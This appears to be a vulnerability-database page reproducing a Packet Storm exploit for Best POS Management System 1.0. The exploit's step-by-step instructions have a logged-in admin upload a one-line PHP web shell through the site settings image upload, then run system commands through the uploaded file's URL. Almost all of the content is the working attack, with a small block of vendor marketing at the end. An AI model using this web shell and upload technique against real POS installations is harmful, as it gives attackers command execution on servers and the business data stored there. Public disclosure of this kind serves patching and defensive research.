Lucene search
K

Best POS Management System 1.0 Shell Upload

🗓️ 17 Feb 2023 00:00:00Reported by Ahmed IsmailType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 240 Views

Authenticated Remote Code Execution on File Upload in Best POS Management System 1.

Code
`# Exploit Title: Authenticated Remote Code Execution on File Upload  
# Google Dork: NA  
# Date: 17/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA  
  
### Steps to Reproduce  
  
1- Login as Admin Rule  
  
2- Head to " http://localhost/kruxton/index.php?page=site_settings"  
  
3- Try to Upload an image here it will be a shell.php  
  
```  
  
shell.php  
``````  
  
<?php system($_GET['cmd']); ?>  
  
4- Head to http://localhost/kruxton/assets/uploads/  
  
5- Access your uploaded Shell  
http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation